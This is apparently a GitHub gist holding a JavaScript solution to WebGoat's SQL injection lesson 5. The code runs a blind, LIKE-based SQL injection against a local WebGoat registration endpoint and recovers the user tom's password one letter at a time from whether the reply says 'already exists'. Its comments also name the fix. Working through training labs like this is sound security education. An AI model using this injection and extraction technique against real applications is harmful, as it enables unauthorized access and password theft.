
@hendrixjoseph
Created June 24, 2022 14:10
WebGoat SQL Injection Lesson 5 Solution
/**
 * Extends a known password prefix by one lowercase letter, using the WebGoat
 * "SqlInjectionAdvanced/challenge" registration form on localhost as a
 * yes/no oracle.
 *
 * Each request sends `tom' AND password like '<prefix><letter>%` as the
 * username_reg field ('+' is a form-encoded space, '%25' is the LIKE wildcard
 * '%'). A feedback message containing "already exists" is read as "the
 * condition matched".
 *
 * NOTE(review): this only works if the endpoint places username_reg into its
 * SQL text unescaped and answers differently for match / no match, which is
 * presumably the flaw this lesson demonstrates. A parameterized query plus a
 * registration response that does not reveal whether a row matched removes
 * the oracle.
 *
 * @param {string} [password] - prefix confirmed so far; any falsy value is
 *   treated as the empty string.
 * @returns {Promise<string|undefined>} the prefix plus the first letter in
 *   'a'..'z' that the server confirms, or undefined when none of the 26
 *   letters is confirmed.
 */
let findNextLetter = async function(password) {
  const prefix = password ? password : "";

  // Request headers as captured from the lesson page's own XHR.
  const requestHeaders = {
    "accept": "*/*",
    "accept-language": "en-US,en;q=0.9",
    "content-type": "application/x-www-form-urlencoded; charset=UTF-8",
    "sec-fetch-dest": "empty",
    "sec-fetch-mode": "cors",
    "sec-fetch-site": "same-origin",
    "sec-gpc": "1",
    "x-requested-with": "XMLHttpRequest"
  };

  const firstCode = 'a'.charCodeAt(0);
  const lastCode = 'z'.charCodeAt(0);

  // Only lowercase a-z is probed, one request per candidate letter.
  for (let code = firstCode; code <= lastCode; code += 1) {
    const candidate = prefix + String.fromCharCode(code);

    // "credentials: include" sends the existing WebGoat session cookie, so the
    // call is expected to run in a browser tab that is logged in to WebGoat.
    const reply = await fetch("http://localhost:8080/WebGoat/SqlInjectionAdvanced/challenge", {
      "headers": requestHeaders,
      "referrer": "http://localhost:8080/WebGoat/start.mvc",
      "referrerPolicy": "strict-origin-when-cross-origin",
      "body": `username_reg=tom'+AND+password+like+'${candidate}%25&email_reg=hendrixjoseph%40aol.com&password_reg=pw&confirm_password_reg=pw`,
      "method": "PUT",
      "mode": "cors",
      "credentials": "include"
    });

    const payload = await reply.json();
    const confirmed = payload.feedback.includes('already exists');
    if (confirmed) {
      return candidate;
    }
  }

  // No letter was confirmed for this prefix.
  return undefined;
}
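/**
 * Repeatedly calls findNextLetter to grow a password prefix one letter at a
 * time, logging the prefix after every confirmed letter.
 *
 * Fixes relative to the original listing:
 *  - the loop body declared a second `let password`, so the call
 *    `findNextLetter(password)` read that inner binding before it was
 *    initialised and threw a ReferenceError on the first iteration;
 *  - when findNextLetter confirms no letter it returns undefined; the loop now
 *    stops there instead of feeding undefined back in, which restarts from "".
 *
 * @param {number} [size] - maximum number of letters to add; any falsy value
 *   means 10.
 * @param {string} [start] - prefix to start from; undefined starts empty.
 * @returns {Promise<string|undefined>} the longest confirmed prefix, or
 *   `start` unchanged when no letter was confirmed.
 */
let findPassword = async function(size, start) {
  const rounds = size ? size : 10;
  let password = start;

  for (let i = 0; i < rounds; i += 1) {
    const extended = await findNextLetter(password);
    if (extended === undefined) {
      // Nothing in a-z matched: the prefix is complete or the next character
      // is outside the probed range.
      break;
    }
    password = extended;
    console.log(password);
  }

  return password;
}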